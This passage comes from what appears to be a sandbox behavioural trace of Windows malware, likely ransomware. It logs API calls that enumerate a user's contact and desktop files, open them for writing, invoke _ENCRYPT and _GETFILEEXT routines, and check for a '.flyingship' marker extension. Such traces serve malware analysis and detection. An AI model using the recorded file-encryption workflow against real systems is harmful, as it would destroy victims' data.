lpMsg=0x87f5c4) returned 0 [0158.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 0x90add8 [0158.038] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.038] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 0x90add8 [0158.038] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.038] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.039] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.039] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.039] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.039] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.039] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.039] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.039] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.039] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.039] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.039] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.040] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.040] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.040] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.040] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.040] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.040] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.040] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.041] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.041] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.041] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.041] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.041] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0x90add8 [0158.041] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.042] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.042] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0x90add8 [0158.042] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.042] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.042] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.042] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.042] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.042] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.042] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.042] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.042] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.042] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.042] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.042] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bhg xz5nypyf_.flyingship.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.045] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.045] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.045] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.045] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.045] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.045] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.045] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.045] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.045] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.045] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.045] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.045] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.046] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.046] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.046] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.046] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9818c40, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc9818c40, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9864f00, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x32a0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="BhG Xz5NyPYF_.flyingship.flv", cAlternateFileName="BHGXZ5~2.FLV")) returned 0x90add8 [0158.046] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.046] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.046] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9818c40, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc9818c40, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9864f00, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x32a0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="BhG Xz5NyPYF_.flyingship.flv", cAlternateFileName="BHGXZ5~2.FLV")) returned 0x90add8 [0158.046] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.046] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zwnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, 